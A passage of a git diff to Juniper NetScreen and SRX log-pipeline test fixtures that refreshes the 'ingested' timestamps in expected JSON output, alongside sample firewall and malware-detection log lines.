10.219.1.151, router ID mnihilm) on Interface enp0s3375 forcing the interface to drop the packet.", "event": { - "ingested": "2021-12-10T10:13:47.070541100Z" + "ingested": "2021-12-14T14:47:07.665169501Z" }, "ecs": { "version": "1.12.0" @@ -459,7 +459,7 @@ { "message": "eque: NetScreen device_id=eufug [est]system-medium-00075: The local device ntincul in the Virtual Security Device group reet tquo", "event": { - "ingested": "2021-12-10T10:13:47.070550Z" + "ingested": "2021-12-14T14:47:07.665169888Z" }, "ecs": { "version": "1.12.0" @@ -471,7 +471,7 @@ { "message": "imadmini: NetScreen device_id=ide [edq]system-medium-00026(tise): SSH: Attempt to unbind PKA key from admin user 'ntut' (Key ID emullam)", "event": { - "ingested": "2021-12-10T10:13:47.070558900Z" + "ingested": "2021-12-14T14:47:07.665170277Z" }, "ecs": { "version": "1.12.0" @@ -483,7 +483,7 @@ { "message": "ihilmole: NetScreen device_id=saquaea [ons]system-high-00048(quas): Route map entry with sequence number gia in route map binck-ospf in virtual router itatio was porinc (2017-8-22 23:52:50)", "event": { - "ingested": "2021-12-10T10:13:47.070567800Z" + "ingested": "2021-12-14T14:47:07.665170656Z" }, "ecs": { "version": "1.12.0" @@ -495,7 +495,7 @@ { "message": "orum: NetScreen device_id=oinBCSed [orem]system-medium-00050(ilm): Track IP enabled (2017-9-6 06:55:24)", "event": { - "ingested": "2021-12-10T10:13:47.070576800Z" + "ingested": "2021-12-14T14:47:07.665171040Z" }, "ecs": { "version": "1.12.0" @@ -507,7 +507,7 @@ { "message": "ncididun: NetScreen device_id=hen [periamea]system-medium-00555: Vrouter ali PIMSM cannot process non-multicast address 10.158.18.51", "event": { - "ingested": "2021-12-10T10:13:47.070585800Z" + "ingested": "2021-12-14T14:47:07.665171419Z" }, "ecs": { "version": "1.12.0" @@ -519,7 +519,7 @@ { "message": "umwri: NetScreen device_id=odoc [atura]system-high-00030: SYSTEM CPU utilization is high (oreeu \u003e nvo ) iamqui times in tassita minute (2017-10-4 21:00:32)\u003c\u003ccolabori\u003e", "event": { - "ingested": "2021-12-10T10:13:47.070593200Z" + "ingested": "2021-12-14T14:47:07.665171920Z" }, "ecs": { "version": "1.12.0" @@ -531,7 +531,7 @@ { "message": "inc: NetScreen device_id=tect [uiad]system-low-00003: The console debug buffer has been roinBCSe", "event": { - "ingested": "2021-12-10T10:13:47.070597400Z" + "ingested": "2021-12-14T14:47:07.665172300Z" }, "ecs": { "version": "1.12.0" @@ -543,7 +543,7 @@ { "message": "nseq: NetScreen device_id=borumSec [tatemseq]system-medium-00026(dmi): SCS has been tam for eth7686 .", "event": { - "ingested": "2021-12-10T10:13:47.070603500Z" + "ingested": "2021-12-14T14:47:07.665172694Z" }, "ecs": { "version": "1.12.0" @@ -555,7 +555,7 @@ { "message": "uiineavo: NetScreen device_id=sistena [uidexeac]system-high-00620(amquisno): RTSYNC: Event posted to send all the DRP routes to backup device. (2017-11-16 18:08:15)", "event": { - "ingested": "2021-12-10T10:13:47.070610300Z" + "ingested": "2021-12-14T14:47:07.665173094Z" }, "ecs": { "version": "1.12.0" @@ -567,7 +567,7 @@ { "message": "sunt: NetScreen device_id=dquianon [urExc]system-high-00025(iamqui): PKI: The current device quide to save the certificate authority configuration.", "event": { - "ingested": "2021-12-10T10:13:47.070617700Z" + "ingested": "2021-12-14T14:47:07.665173519Z" }, "ecs": { "version": "1.12.0" @@ -579,7 +579,7 @@ { "message": "etdol: NetScreen device_id=Sed [oremeumf]system-high-00076: The local device etur in the Virtual Security Device group fugiatn enima", "event": { - "ingested": "2021-12-10T10:13:47.070626800Z" + "ingested": "2021-12-14T14:47:07.665173902Z" }, "ecs": { "version": "1.12.0" @@ -591,7 +591,7 @@ { "message": "giatquo: NetScreen device_id=lors [its]system-low-00524: SNMP request from an unknown SNMP community public at 10.46.217.155:76 has been received. (2017-12-29 15:15:58)", "event": { - "ingested": "2021-12-10T10:13:47.070635900Z" + "ingested": "2021-12-14T14:47:07.665174437Z" }, "ecs": { "version": "1.12.0" @@ -603,7 +603,7 @@ { "message": "magnaa: NetScreen device_id=sumquiad [No Name]system-high-00628: audit log queue Event Log is overwritten (2018-1-12 22:18:32)", "event": { - "ingested": "2021-12-10T10:13:47.070645200Z" + "ingested": "2021-12-14T14:47:07.665174976Z" }, "ecs": { "version": "1.12.0" @@ -615,7 +615,7 @@ { "message": "tnulapa: NetScreen device_id=madmi [No Name]system-high-00628(adeser): audit log queue Event Log is overwritten (2018-1-27 05:21:06)", "event": { - "ingested": "2021-12-10T10:13:47.070654500Z" + "ingested": "2021-12-14T14:47:07.665175369Z" }, "ecs": { "version": "1.12.0" @@ -627,7 +627,7 @@ { "message": "laboree: NetScreen device_id=udantiu [itametco]system-high-00556(stiaecon): UF-MGR: usBono CPA server port changed to rumexe.", "event": { - "ingested": "2021-12-10T10:13:47.070663500Z" + "ingested": "2021-12-14T14:47:07.665175759Z" }, "ecs": { "version": "1.12.0" @@ -639,7 +639,7 @@ { "message": "nturmag: NetScreen device_id=uredol [maliqua]system-medium-00058(mquia): PIMSM protocol configured on interface eth2266", "event": { - "ingested": "2021-12-10T10:13:47.070672600Z" + "ingested": "2021-12-14T14:47:07.665176149Z" }, "ecs": { "version": "1.12.0" @@ -651,7 +651,7 @@ { "message": "ueporroq: NetScreen device_id=ute [No Name]system-low-00625: Session (id tationu src-ip 10.142.21.251 dst-ip 10.154.16.147 dst port 6881) route is valid. (2018-3-11 02:28:49)", "event": { - "ingested": "2021-12-10T10:13:47.070681500Z" + "ingested": "2021-12-14T14:47:07.665176590Z" }, "ecs": { "version": "1.12.0" @@ -663,7 +663,7 @@ { "message": "adipi: NetScreen device_id=mquis [ratvo]system-low-00042(isno): Replay packet detected on IPSec tunnel on enp0s1170 with tunnel ID nderiti! From 10.105.212.51 to 10.119.53.68/1783, giatqu (2018-3-25 09:31:24)", "event": { - "ingested": "2021-12-10T10:13:47.070690400Z" + "ingested": "2021-12-14T14:47:07.665177004Z" }, "ecs": { "version": "1.12.0" @@ -675,7 +675,7 @@ { "message": "emvel: NetScreen device_id=pta [dolo]system-medium-00057(eacommod): uamqu: static multicast route src=10.174.2.175, grp=aparia input ifp = lo6813 output ifp = enp0s90 added", "event": { - "ingested": "2021-12-10T10:13:47.070699600Z" + "ingested": "2021-12-14T14:47:07.665177392Z" }, "ecs": { "version": "1.12.0" @@ -687,7 +687,7 @@ { "message": "giat: NetScreen device_id=ttenb [eirure]system-high-00549(rem): add-route-\u003e untrust-vr: exer", "event": { - "ingested": "2021-12-10T10:13:47.070708500Z" + "ingested": "2021-12-14T14:47:07.665177782Z" }, "ecs": { "version": "1.12.0" @@ -699,7 +699,7 @@ { "message": "lapari: NetScreen device_id=rcitat [cinge]system-high-00536(luptate): IKE gateway eritqu has been elites. pariat", "event": { - "ingested": "2021-12-10T10:13:47.070714900Z" + "ingested": "2021-12-14T14:47:07.665178198Z" }, "ecs": { "version": "1.12.0" @@ -711,7 +711,7 @@ { "message": "accus: NetScreen device_id=CSed [tiu]system-low-00049(upta): The router-id of virtual router \"asper\" used by OSPF, BGP routing instances id has been uninitialized. (dictasun)", "event": { - "ingested": "2021-12-10T10:13:47.070721600Z" + "ingested": "2021-12-14T14:47:07.665178590Z" }, "ecs": { "version": "1.12.0" @@ -723,7 +723,7 @@ { "message": "itanimi: NetScreen device_id=onoru [data]system-high-00064(eosqui): Can not create track-ip list", "event": { - "ingested": "2021-12-10T10:13:47.070737600Z" + "ingested": "2021-12-14T14:47:07.665178967Z" }, "ecs": { "version": "1.12.0" @@ -735,7 +735,7 @@ { "message": "int: NetScreen device_id=ionevo [llitani]system-high-00541(itametco): The system killed OSPF neighbor because the current router could not see itself in the hello packet. Neighbor changed state from etcons to etco state, (neighbor router-id 1iuntN, ip-address 10.89.179.48). (2018-6-19 03:46:49)", "event": { - "ingested": "2021-12-10T10:13:47.070743Z" + "ingested": "2021-12-14T14:47:07.665179364Z" }, "ecs": { "version": "1.12.0" @@ -747,7 +747,7 @@ { "message": "mmodicon: NetScreen device_id=eetdo [mquisno]system-low-00017(lup): mipsamv From 10.57.108.5:5523 using protocol icmp on interface enp0s4987. The attack occurred 2282 times", "event": { - "ingested": "2021-12-10T10:13:47.070748Z" + "ingested": "2021-12-14T14:47:07.665179742Z" }, "ecs": { "version": "1.12.0" @@ -759,7 +759,7 @@ { "message": "inimve: NetScreen device_id=aea [emipsumd]system-low-00263(ptat): Admin user saq has been accepted via the asiarch server at 10.197.10.110", "event": { - "ingested": "2021-12-10T10:13:47.070754700Z" + "ingested": "2021-12-14T14:47:07.665180132Z" }, "ecs": { "version": "1.12.0" @@ -771,7 +771,7 @@ { "message": "tlab: NetScreen device_id=vel [ionevo]system-high-00622: NHRP : NHRP instance in virtual router ptate is created. (2018-8-1 00:54:32)", "event": { - "ingested": "2021-12-10T10:13:47.070764700Z" + "ingested": "2021-12-14T14:47:07.665180515Z" }, "ecs": { "version": "1.12.0" @@ -783,7 +783,7 @@ { "message": "qui: NetScreen device_id=caboN [imipsam]system-high-00528(catcupid): SSH: Admin user 'ritquiin' at host 10.59.51.171 requested unsupported authentication method texplica", "event": { - "ingested": "2021-12-10T10:13:47.070770800Z" + "ingested": "2021-12-14T14:47:07.665181045Z" }, "ecs": { "version": "1.12.0" @@ -795,7 +795,7 @@ { "message": "udexerci: NetScreen device_id=uae [imveni]system-medium-00071(ptatemse): NSRP: Unit itationu of VSD group setquas nbyCi", "event": { - "ingested": "2021-12-10T10:13:47.070777700Z" + "ingested": "2021-12-14T14:47:07.665181498Z" }, "ecs": { "version": "1.12.0" @@ -807,7 +807,7 @@ { "message": "isno: NetScreen device_id=luptatev [occaeca]system-high-00018(urau): aeca Policy (oNem, itaedict ) was eroi from host 10.80.103.229 by admin fugitsed (2018-9-12 22:02:15)", "event": { - "ingested": "2021-12-10T10:13:47.070790200Z" + "ingested": "2021-12-14T14:47:07.665181907Z" }, "ecs": { "version": "1.12.0" @@ -819,7 +819,7 @@ { "message": "utlabore: NetScreen device_id=edquiano [mSecti]system-high-00207(tDuisaut): RIP database size limit exceeded for uel, RIP route dropped.", "event": { - "ingested": "2021-12-10T10:13:47.070797800Z" + "ingested": "2021-12-14T14:47:07.665182299Z" }, "ecs": { "version": "1.12.0" @@ -831,7 +831,7 @@ { "message": "agn: NetScreen device_id=iqu [quamqua]system-high-00075: NSRP: Unit equeporr of VSD group amremap oremagna", "event": { - "ingested": "2021-12-10T10:13:47.070803100Z" + "ingested": "2021-12-14T14:47:07.665182694Z" }, "ecs": { "version": "1.12.0" @@ -843,7 +843,7 @@ { "message": "ntium: NetScreen device_id=ide [quunturm]system-low-00040(isautem): High watermark for early aging has been changed to the default usan", "event": { - "ingested": "2021-12-10T10:13:47.070807500Z" + "ingested": "2021-12-14T14:47:07.665183076Z" }, "ecs": { "version": "1.12.0" @@ -855,7 +855,7 @@ { "message": "catcu: NetScreen device_id=quame [tionemu]system-low-00524(eursi): SNMP host 10.163.9.35 cannot be removed from community uatDu because failure", "event": { - "ingested": "2021-12-10T10:13:47.070812Z" + "ingested": "2021-12-14T14:47:07.665183468Z" }, "ecs": { "version": "1.12.0" @@ -867,7 +867,7 @@ { "message": "cteturad: NetScreen device_id=modi [No Name]system-low-00625(ecatcu): Session (id ntoccae src-ip 10.51.161.245 dst-ip 10.193.80.21 dst port 5657) route is valid. (2018-11-23 09:15:06)", "event": { - "ingested": "2021-12-10T10:13:47.070815900Z" + "ingested": "2021-12-14T14:47:07.665183855Z" }, "ecs": { "version": "1.12.0" @@ -879,7 +879,7 @@ { "message": "chit: NetScreen device_id=iusmodit [lor]system-high-00524(adeserun): SNMP request has been received, but success", "event": { - "ingested": "2021-12-10T10:13:47.070822Z" + "ingested": "2021-12-14T14:47:07.665184244Z" }, "ecs": { "version": "1.12.0" @@ -891,7 +891,7 @@ { "message": "vento: NetScreen device_id=litsed [ciun]system-medium-00072: The local device inrepr in the Virtual Security Device group lla changed state", "event": { - "ingested": "2021-12-10T10:13:47.070827500Z" + "ingested": "2021-12-14T14:47:07.665184774Z" }, "ecs": { "version": "1.12.0" @@ -903,7 +903,7 @@ { "message": "rissusci: NetScreen device_id=uaturQ [iusmod]system-medium-00533(mips): VIP server 10.41.222.7 is now responding", "event": { - "ingested": "2021-12-10T10:13:47.070835Z" + "ingested": "2021-12-14T14:47:07.665185174Z" }, "ecs": { "version": "1.12.0" @@ -915,7 +915,7 @@ { "message": "upta: NetScreen device_id=ivel [tmollita]system-low-00070(deFinib): NSRP: nsrp control channel change to lo4065", "event": { - "ingested": "2021-12-10T10:13:47.070843900Z" + "ingested": "2021-12-14T14:47:07.665185661Z" }, "ecs": { "version": "1.12.0" @@ -927,7 +927,7 @@ { "message": "ommodic: NetScreen device_id=mmodic [essequam]system-low-00040(nihi): VPN 'xeaco' from 10.134.20.213 is eavolupt (2019-2-2 20:27:57)", "event": { - "ingested": "2021-12-10T10:13:47.070852700Z" + "ingested": "2021-12-14T14:47:07.665186091Z" }, "ecs": { "version": "1.12.0" @@ -939,7 +939,7 @@ { "message": "ptasnul: NetScreen device_id=utaliqui [mcorpor]system-medium-00023(ostru): VIP/load balance server 10.110.144.189 cannot be contacted", "event": { - "ingested": "2021-12-10T10:13:47.070861500Z" + "ingested": "2021-12-14T14:47:07.665186515Z" }, "ecs": { "version": "1.12.0" @@ -951,7 +951,7 @@ { "message": "luptatem: NetScreen device_id=ing [hen]system-medium-00034(umquid): SCS: SCS has been olabo for tasnu with conse existing PKA keys already bound to ruredolo SSH users.", "event": { - "ingested": "2021-12-10T10:13:47.070870200Z" + "ingested": "2021-12-14T14:47:07.665186907Z" }, "ecs": { "version": "1.12.0" @@ -963,7 +963,7 @@ { "message": "iat: NetScreen device_id=orain [equaturQ]system-low-00554: SCAN-MGR: Attempted to load AV pattern file created quia after the AV subscription expired. (Exp: Exce)", "event": { - "ingested": "2021-12-10T10:13:47.070878900Z" + "ingested": "2021-12-14T14:47:07.665187296Z" }, "ecs": { "version": "1.12.0" @@ -975,7 +975,7 @@ { "message": "dese: NetScreen device_id=ptasn [liqui]system-low-00541: ScreenOS invol serial # Loremips: Asset recovery has been cidun", "event": { - "ingested": "2021-12-10T10:13:47.070887700Z" + "ingested": "2021-12-14T14:47:07.665187688Z" }, "ecs": { "version": "1.12.0" @@ -987,7 +987,7 @@ { "message": "ole: NetScreen device_id=odi [tper]system-medium-00628(ectetur): audit log queue Event Log is overwritten (2019-4-15 07:40:49)", "event": { - "ingested": "2021-12-10T10:13:47.070896400Z" + "ingested": "2021-12-14T14:47:07.665188069Z" }, "ecs": { "version": "1.12.0" @@ -999,7 +999,7 @@ { "message": "iadolo: NetScreen device_id=ecatcup [No Name]system-high-00628: audit log queue Traffic Log is overwritten (2019-4-29 14:43:23)", "event": { - "ingested": "2021-12-10T10:13:47.070905300Z" + "ingested": "2021-12-14T14:47:07.665188457Z" }, "ecs": { "version": "1.12.0" @@ -1011,7 +1011,7 @@ { "message": "qui: NetScreen device_id=iaecon [dminima]system-high-00538(psaquaea): NACN failed to register to Policy Manager eabillo because of success", "event": { - "ingested": "2021-12-10T10:13:47.070914100Z" + "ingested": "2021-12-14T14:47:07.665188882Z" }, "ecs": { "version": "1.12.0" @@ -1023,7 +1023,7 @@ { "message": "eosqu: NetScreen device_id=reetdolo [umquam]system-low-00075(enderi): The local device labore in the Virtual Security Device group uasiarch changed state from iamquisn to inoperable. (2019-5-28 04:48:31)", "event": { - "ingested": "2021-12-10T10:13:47.070923100Z" + "ingested": "2021-12-14T14:47:07.665190273Z" }, "ecs": { "version": "1.12.0" @@ -1035,7 +1035,7 @@ { "message": "veleumi: NetScreen device_id=volupt [equ]system-high-00535(ure): SCEP_FAILURE message has been received from the CA", "event": { - "ingested": "2021-12-10T10:13:47.070931200Z" + "ingested": "2021-12-14T14:47:07.665190723Z" }, "ecs": { "version": "1.12.0" @@ -1047,7 +1047,7 @@ { "message": "reseo: NetScreen device_id=entoreve [rudexer]system-medium-00026(iruredol): IKE iad: Missing heartbeats have exceeded the threshold. All Phase 1 and 2 SAs have been removed", "event": { - "ingested": "2021-12-10T10:13:47.070936800Z" + "ingested": "2021-12-14T14:47:07.665191124Z" }, "ecs": { "version": "1.12.0" @@ -1059,7 +1059,7 @@ { "message": "ptate: NetScreen device_id=oloreeu [imipsa]system-high-00038: OSPF routing instance in vrouter uame taevitae", "event": { - "ingested": "2021-12-10T10:13:47.070942900Z" + "ingested": "2021-12-14T14:47:07.665191525Z" }, "ecs": { "version": "1.12.0" @@ -1071,7 +1071,7 @@ { "message": "archi: NetScreen device_id=caboNe [ptate]system-high-00003(ius): Multiple authentication failures have been detected!", "event": { - "ingested": "2021-12-10T10:13:47.070952Z" + "ingested": "2021-12-14T14:47:07.665191910Z" }, "ecs": { "version": "1.12.0" @@ -1083,7 +1083,7 @@ { "message": "remap: NetScreen device_id=ntium [veniamqu]system-high-00529: DNS entries have been refreshed by HA", "event": { - "ingested": "2021-12-10T10:13:47.070960900Z" + "ingested": "2021-12-14T14:47:07.665192360Z" }, "ecs": { "version": "1.12.0" @@ -1095,7 +1095,7 @@ { "message": "llumdo: NetScreen device_id=tot [itquii]system-high-00625(erspici): Session (id oreeu src-ip 10.126.150.15 dst-ip 10.185.50.112 dst port 7180) route is invalid. (2019-8-21 23:03:57)", "event": { - "ingested": "2021-12-10T10:13:47.070969800Z" + "ingested": "2021-12-14T14:47:07.665192749Z" }, "ecs": { "version": "1.12.0" @@ -1107,7 +1107,7 @@ { "message": "quepo: NetScreen device_id=tDuisa [iscive]system-medium-00521: Can't connect to E-mail server 10.152.90.59", "event": { - "ingested": "2021-12-10T10:13:47.070978700Z" + "ingested": "2021-12-14T14:47:07.665193129Z" }, "ecs": { "version": "1.12.0" @@ -1119,7 +1119,7 @@ { "message": "lorem: NetScreen device_id=icons [hende]system-low-00077(usBonor): HA link disconnect. Begin to use second path of HA", "event": { - "ingested": "2021-12-10T10:13:47.070985400Z" + "ingested": "2021-12-14T14:47:07.665193510Z" }, "ecs": { "version": "1.12.0" @@ -1131,7 +1131,7 @@ { "message": "preh: NetScreen device_id=dol [No Name]system-low-00625: Session (id gnamal src-ip 10.119.181.171 dst-ip 10.166.144.66 dst port 3051) route is invalid. (2019-10-3 20:11:40)", "event": { - "ingested": "2021-12-10T10:13:47.070991600Z" + "ingested": "2021-12-14T14:47:07.665193903Z" }, "ecs": { "version": "1.12.0" @@ -1143,7 +1143,7 @@ { "message": "avolup: NetScreen device_id=litse [archit]system-high-00041(untutlab): A route-map name in virtual router estqu has been removed", "event": { - "ingested": "2021-12-10T10:13:47.071000600Z" + "ingested": "2021-12-14T14:47:07.665194296Z" }, "ecs": { "version": "1.12.0" @@ -1155,7 +1155,7 @@ { "message": "eddoeiu: NetScreen device_id=consect [eetdolo]system-medium-00038(remipsum): OSPF routing instance in vrouter ons emporin", "event": { - "ingested": "2021-12-10T10:13:47.071009500Z" + "ingested": "2021-12-14T14:47:07.665194889Z" }, "ecs": { "version": "1.12.0" @@ -1167,7 +1167,7 @@ { "message": "texpl: NetScreen device_id=isquames [No Name]system-low-00021: DIP port-translation stickiness was atio by utla via ntm from host 10.96.165.147 to 10.96.218.99:277 (2019-11-15 17:19:22)", "event": { - "ingested": "2021-12-10T10:13:47.071018300Z" + "ingested": "2021-12-14T14:47:07.665195276Z" }, "ecs": { "version": "1.12.0" @@ -1179,7 +1179,7 @@ { "message": "elaudant: NetScreen device_id=ratvolu [odte]system-medium-00021(eum): DIP port-translation stickiness was uidol by repr via idu from host 10.201.72.59 to 10.230.29.67:7478 (2019-11-30 00:21:57)", "event": { - "ingested": "2021-12-10T10:13:47.071027200Z" + "ingested": "2021-12-14T14:47:07.665195659Z" }, "ecs": { "version": "1.12.0" @@ -1191,7 +1191,7 @@ { "message": "toc: NetScreen device_id=rau [sciuntN]system-low-00602: PIMSM Error in initializing interface state change", "event": { - "ingested": "2021-12-10T10:13:47.071035800Z" + "ingested": "2021-12-14T14:47:07.665196044Z" }, "ecs": { "version": "1.12.0" diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log-expected.json index 85bf03ddb14..777f3fb7c80 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log-expected.json +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log-expected.json @@ -86,7 +86,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:49.798358700Z", + "ingested": "2021-12-14T14:47:10.183090634Z", "original": "\u003c14\u003e1 2013-12-14T16:06:59.134Z pinarello RT_AAMW - SRX_AAMW_ACTION_LOG [junos@xxx.x.x.x.x.28 http-host=\"www.mytest.com\" file-category=\"executable\" action=\"BLOCK\" verdict-number=\"8\" verdict-source=”cloud/blacklist/whitelist” source-address=\"10.10.10.1\" source-port=\"57116\" destination-address=\"67.43.156.14\" destination-port=\"80\" protocol-id=\"6\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" policy-name=\"argon_policy\" username=\"user1\" session-id-32=\"50000002\" source-zone-name=\"untrust\" destination-zone-name=\"trust\"]", "kind": "alert", "action": "malware_detected", @@ -147,7 +147,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:49.798372100Z", + "ingested": "2021-12-14T14:47:10.183094173Z", "original": "\u003c14\u003e1 2016-09-20T10:43:30.330-07:00 host-example RT_AAMW - AAMW_MALWARE_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp=\"Thu Jun 23 09:55:38 2016\" tenant-id=\"ABC123456\" sample-sha256=\"ABC123\" client-ip=\"192.168.2.0\" verdict-number=\"9\" malware-info=\"Eicar:TestVirus\" username=\"admin\" hostname=\"host.example.com\"]", "kind": "alert", "action": "malware_detected", @@ -208,7 +208,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:13:49.798377Z", + "ingested": "2021-12-14T14:47:10.183094689Z", "original": "\u003c11\u003e1 2016-09-20T10:40:30.050-07:00 host-example RT_AAMW - AAMW_HOST_INFECTED_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp=\"Thu Jun 23 09:55:38 2016\" tenant-id=\"ABC123456\" client-ip=\"192.168.2.0\" hostname=\"host.example.com\" status=\"in_progress\" policy-name=\"default\" th=\"7\" state=\"added\" reason=\"malware\" message=\"malware analysis detected host downloaded a malicious_file with score 9, sha256 ABC123\"]", "kind": "alert", "category": [ @@ -308,7 +308,7 @@ }, "event": { "severity": 165, - "ingested": "2021-12-10T10:13:49.798383500Z", + "ingested": "2021-12-14T14:47:10.183095105Z", "original": "\u003c165\u003e1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@67.43.156.15 hostname=\"dummy_host\" file-category=\"executable\" verdict-number=\"10\" malware-info=\"Testfile\" action=\"PERMIT\" list-hit=\"N/A\" file-hash-lookup=\"FALSE\" source-address=\"67.43.156.15\" source-port=\"60148\" destination-address=\"10.0.0.1\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" policy-name=\"test-policy\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502156\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" sample-sha256=\"e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494\" file-name=\"dummy_file\" url=\"dummy_url\"]", "kind": "event", "category": [ diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log-expected.json index 0372dd350ea..b0d8688a8b9 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log-expected.json +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log-expected.json @@ -80,7 +80,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:51.706916400Z", + "ingested": "2021-12-14T14:47:11.679892458Z", "original": "\u003c14\u003e1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"10.0.0.1\" source-port=\"594\" destination-address=\"10.128.0.1\" destination-port=\"10400\" connection-tag=\"0\" service-name=\"icmp\" nat-source-address=\"10.0.0.1\" nat-source-port=\"594\" nat-destination-address=\"10.128.0.1\" nat-destination-port=\"10400\" nat-connection-tag=\"0\" src-nat-rule-type=\"N/A\" src-nat-rule-name=\"N/A\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"1\" policy-name=\"vpn_trust_permit-all\" source-zone-name=\"vpn\" destination-zone-name=\"trust\" session-id-32=\"6093\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"st0.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", "risk_score": 1.0, "kind": "event", @@ -163,7 +163,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:51.706995100Z", + "ingested": "2021-12-14T14:47:11.679895607Z", "original": "\u003c14\u003e1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@67.43.156.15 source-address=\"10.0.0.26\" source-port=\"37233\" destination-address=\"10.128.0.1\" destination-port=\"161\" connection-tag=\"0\" service-name=\"None\" protocol-id=\"17\" icmp-type=\"0\" policy-name=\"MgmtAccess-trust-cleanup\" source-zone-name=\"trust\" destination-zone-name=\"junos-host\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\".local..0\" encrypted=\"No\" reason=\"Denied by policy\" session-id-32=\"7087\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", "risk_score": 1.0, "kind": "event", @@ -265,7 +265,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:51.706999500Z", + "ingested": "2021-12-14T14:47:11.679896199Z", "original": "\u003c14\u003e1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@67.43.156.15 source-address=\"67.43.156.15\" source-port=\"56639\" destination-address=\"67.43.156.15\" destination-port=\"2003\" service-name=\"None\" protocol-id=\"6\" icmp-type=\"0\" policy-name=\"log-all-else\" source-zone-name=\"campus\" destination-zone-name=\"mngmt\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth6.0\" encrypted=\"No \"]", "kind": "event", "action": "flow_deny", @@ -392,7 +392,7 @@ "event": { "duration": 60000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707006900Z", + "ingested": "2021-12-14T14:47:11.679896588Z", "original": "\u003c14\u003e1 2014-05-01T08:28:10.933Z fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"unset\" source-address=\"67.43.156.15\" source-port=\"63456\" destination-address=\"67.43.156.15\" destination-port=\"902\" service-name=\"None\" nat-source-address=\"67.43.156.15\" nat-source-port=\"63456\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"902\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"17\" policy-name=\"mngmt-to-vcenter\" source-zone-name=\"mngmt\" destination-zone-name=\"intra\" session-id-32=\"15353\" packets-from-client=\"1\" bytes-from-client=\"94\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"60\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth3.5\" encrypted=\"No \"]", "kind": "event", "start": "2014-05-01T08:28:10.933Z", @@ -510,7 +510,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:51.707014500Z", + "ingested": "2021-12-14T14:47:11.679898074Z", "original": "\u003c14\u003e1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"24065\" destination-address=\"67.43.156.14\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"67.43.156.14\" nat-source-port=\"24065\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"]", "kind": "event", "action": "flow_started", @@ -616,7 +616,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:51.707020500Z", + "ingested": "2021-12-14T14:47:11.679898522Z", "original": "\u003c14\u003e1 2010-09-30T14:55:04.323+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"192.168.2.1\" source-port=\"1\" destination-address=\"192.168.100.12\" destination-port=\"46384\" service-name=\"icmp\" nat-source-address=\"192.168.2.1\" nat-source-port=\"1\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"46384\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"policy1\" source-zone-name=\"trustZone\" destination-zone-name=\"untrustZone\" session-id-32=\"41\" packet-incoming-interface=\"ge-0/0/1.0\"]", "kind": "event", "action": "flow_started", @@ -734,7 +734,7 @@ "event": { "duration": 0, "severity": 14, - "ingested": "2021-12-10T10:13:51.707025300Z", + "ingested": "2021-12-14T14:47:11.679898995Z", 